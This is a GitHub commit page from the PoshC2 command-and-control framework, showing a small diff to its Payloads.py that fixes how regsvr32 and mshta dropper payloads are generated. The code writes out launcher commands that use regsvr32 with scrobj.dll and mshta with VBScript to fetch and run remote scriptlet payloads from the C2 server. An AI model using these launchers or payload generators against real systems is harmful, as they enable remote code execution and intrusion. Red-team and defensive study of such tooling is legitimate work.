Skip to content

Commit

Permalink
Fix mshta & regsvr32 payloads
Browse files Browse the repository at this point in the history
  • Loading branch information
benpturner committed Sep 16, 2020
1 parent 837846a commit eabe936
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions poshc2/server/payloads/Payloads.py
Original file line number Diff line number Diff line change
Expand Up @@ -294,15 +294,15 @@ def CreateShellcode(self, name=""):
def CreateSCT(self, name=""):
self.QuickstartLog(Colours.END)
self.QuickstartLog("regsvr32 /s /n /u /i:%s scrobj.dll" % f"{self.FirstURL}/{self.QuickCommand}_rg")
with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
with open("%s%sdropper_rg.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
content = f.read()
content = str(content) \
.replace("#REPLACEME#", self.CreateRawBase())
with open("%s%srg_sct.xml" % (self.BaseDirectory, name), 'w') as f:
f.write(content)

self.QuickstartLog(Colours.END)
self.QuickstartLog("mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % f"{self.FirstURL}/{self.QuickCommand}_cs")
self.QuickstartLog("mshta.exe 'vbscript:GetObject(\"script:%s\")(window.close)'" % f"{self.FirstURL}/{self.QuickCommand}_cs")
with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
content = f.read()
content = str(content) \
Expand Down

0 comments on commit eabe936

Please sign in to comment.